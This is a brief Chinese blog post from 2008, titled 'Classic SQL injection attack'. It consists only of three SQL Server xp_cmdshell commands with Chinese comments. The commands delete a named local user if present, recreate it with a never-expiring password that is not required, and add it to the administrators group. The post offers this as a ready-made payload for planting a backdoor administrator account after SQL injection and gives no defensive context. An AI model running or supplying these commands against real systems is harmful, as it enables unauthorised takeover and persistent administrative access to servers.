经典Sql注入攻击

EXEC master..xp_cmdshell 'net user USERNAME /Delete' ,no_output   --如果已经存在,删除
 EXEC master..xp_cmdshell 'net user USERNAME PASSWORD /add  /active:"yes" /comment:"For running" /expires:"never" /fullname:"USERNAME" /passwordchg:"no" /passwordreq:"no"',no_output   ---增加USERNAME用户。
 EXEC master..xp_cmdshell 'net localgroup  administrators USERNAME /add',no_output   ---加入超户组
posted on 2008-03-17 11:49  永无止境  阅读(211)  评论(0编辑  收藏  举报